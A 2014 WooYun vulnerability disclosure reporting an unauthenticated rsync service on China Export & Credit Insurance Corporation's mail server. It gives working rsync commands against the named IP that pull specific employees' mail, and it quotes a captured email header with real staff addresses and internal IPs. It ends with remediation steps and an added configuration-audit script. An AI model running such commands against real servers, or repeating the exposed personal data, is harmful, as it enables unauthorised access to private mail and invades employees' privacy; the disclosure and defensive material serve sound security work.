
Information Disclosure in the Internal Mail System of China Export & Credit Insurance Corporation

2014-06-06 14:50

The rsync service on the mail server (202.108.86.210) is misconfigured, so it can be accessed directly from outside.

The modules can be listed directly:

#/bin/bash>rsync 202.108.86.210::

0

1

2

3

4

5

6

7

8

9

a

b

c

d

e

f

eyou

eyouim

emdg

opt



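None of the modules requires a password, and none is bound to an IP address. Modules 0 through f store the mail archives of all users, which can be downloaded freely.

In addition, the inbox and outbox index files can be accessed through the Index folder.

Proof of vulnerability: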

rsync 202.108.86.210::0/9/limw@sinosure.com.cn/Index/Inbox/.index .



[Screenshot: 2014-04-22_2-42-39.jpg]





rsync 202.108.86.210::0/9/limw@sinosure.com.cn/Mail/



[Screenshot: 2014-04-22_2-44-59.jpg]





Looking at the most recent mail record among them (2014.4.21):

Received: from unknown127.0.0.1 (HELO eyou.net) (127.0.0.1)

by 127.0.0.1 with SMTP; Mon, 21 Apr 2014 18:23:00 +0800

X-EYOU-SPAMVALUE:0

X-EMDG-ORIGINAL-FROM:<wangja@sinosure.com.cn>

X-EMDG-ORIGINAL-TO:<limw@sinosure.com.cn>

X-EMDG-ORIGINAL-IP:10.4.1.159

X-EMDG-VER:4.1.0

Received: (eyou anti_spam gateway 4.1.0); Mon, 21 Apr 2014 18:22:58 +0800

Message-ID: <598075778.23584@eyou.net>

X-EMDG-SMTPAUTH: wangja@sinosure.com.cn

Received: from 10.4.1.159 by 10.1.96.28 with SMTP; Mon, 21 Apr 2014 18:22:58 +0800

Date: Mon, 21 Apr 2014 18:23:24 +0800

From: wangjing <wangja@sinosure.com.cn>

To: =?GB2312?B?wO7D986w?= <limw@sinosure.com.cn>,

=?GB2312?B?1KrOsMa7?= <yuanwp@sinosure.com.cn>,

=?GB2312?B?0e69qLuq?= <yangjh@sinosure.com.cn>,

=?GB2312?B?tN69qMHW?= <cuijl@sinosure.com.cn>,

=?GB2312?B?wOjJr968?= <li_sl@sinosure.com.cn>

Subject: =?GB2312?B?16q3ojog16q3ojogobbQ0NK1t+fP1dSkvq/Qxc+iobe12jbG2i1MTke0rMrQs6GhsLnVteOhsbW9wLSjrLSstqu/ycTcw+bB2cbGsvq358/V?=

Disposition-Notification-To: wangjing <wangja@sinosure.com.cn>

X-Priority: 3

X-Has-Attach: yes

X-Mailer: Foxmail 7, 1, 3, 52[cn]

Mime-Version: 1.0

Message-ID: <2014042118232346845011@sinosure.com.cn>

Content-Type: multipart/mixed;

boundary="----=_001_NextPart061445766303_=----"



This is a multi-part message in MIME format.



------=_001_NextPart061445766303_=----

Content-Type: multipart/related;

boundary="----=_002_NextPart636570623135_=----"





------=_002_NextPart636570623135_=----

Content-Type: multipart/alternative;

boundary="----=_003_NextPart651100408022_=----"





------=_003_NextPart651100408022_=----

Content-Type: text/plain;

charset="GB2312"

Content-Transfer-Encoding: base64






------=_003_NextPart651100408022_=----

Content-Type: text/html;



.........



The mail subject after base64 decoding:

[Screenshot: 2014-04-22_2-48-59.jpg]



Remediation:

rsyncd.conf

list=no

Set an access password
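
An added example (not part of the original report): a small Python check that reads an rsyncd.conf and flags modules with the three weaknesses described above, namely anonymous access, no IP restriction, and listable modules. The sample configs, paths and user name are constructed; it assumes global parameters precede the first module and does not follow include directives.

```python
import re

# Constructed samples: module names come from the listing above; the paths,
# the address and the user name are hypothetical.
WEAK = "[0]\npath = /srv/mail/0\n[eyou]\npath = /srv/eyou\n"
HARDENED = ("list = no\nhosts allow = 10.0.0.5\nauth users = backup\n"
            "secrets file = /etc/rsyncd.secrets\n" + WEAK)

def _key(name):
    # Whitespace and case in parameter names are normalised before lookup.
    return re.sub(r"\s+", "", name).lower()

def parse(text):
    """Return {module: effective settings}; global settings act as defaults."""
    defaults, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = modules.setdefault(header.group(1).strip(), {})
        elif "=" in line:
            name, value = line.split("=", 1)  # only the first '=' is significant
            target = defaults if current is None else current
            target[_key(name)] = value.strip()
    return {mod: {**defaults, **cfg} for mod, cfg in modules.items()}

def audit(text):
    """Return {module: [issues]} for modules exposed the way the report describes."""
    findings = {}
    for mod, cfg in parse(text).items():
        issues = []
        if not cfg.get("authusers"):
            issues.append("anonymous access (no 'auth users')")
        elif not cfg.get("secretsfile"):
            issues.append("'auth users' set without 'secrets file'")
        if not (cfg.get("hostsallow") or cfg.get("hostsdeny")):
            issues.append("no 'hosts allow' restriction")
        if cfg.get("list", "yes").lower() not in ("no", "false", "0"):
            issues.append("module is listable ('list' not disabled)")
        if issues:
            findings[mod] = issues
    return findings

if __name__ == "__main__":
    for label, conf in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(conf) or "no findings")
```
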

Source: www.wooyun.org/bugs/wooyun-2014-058013
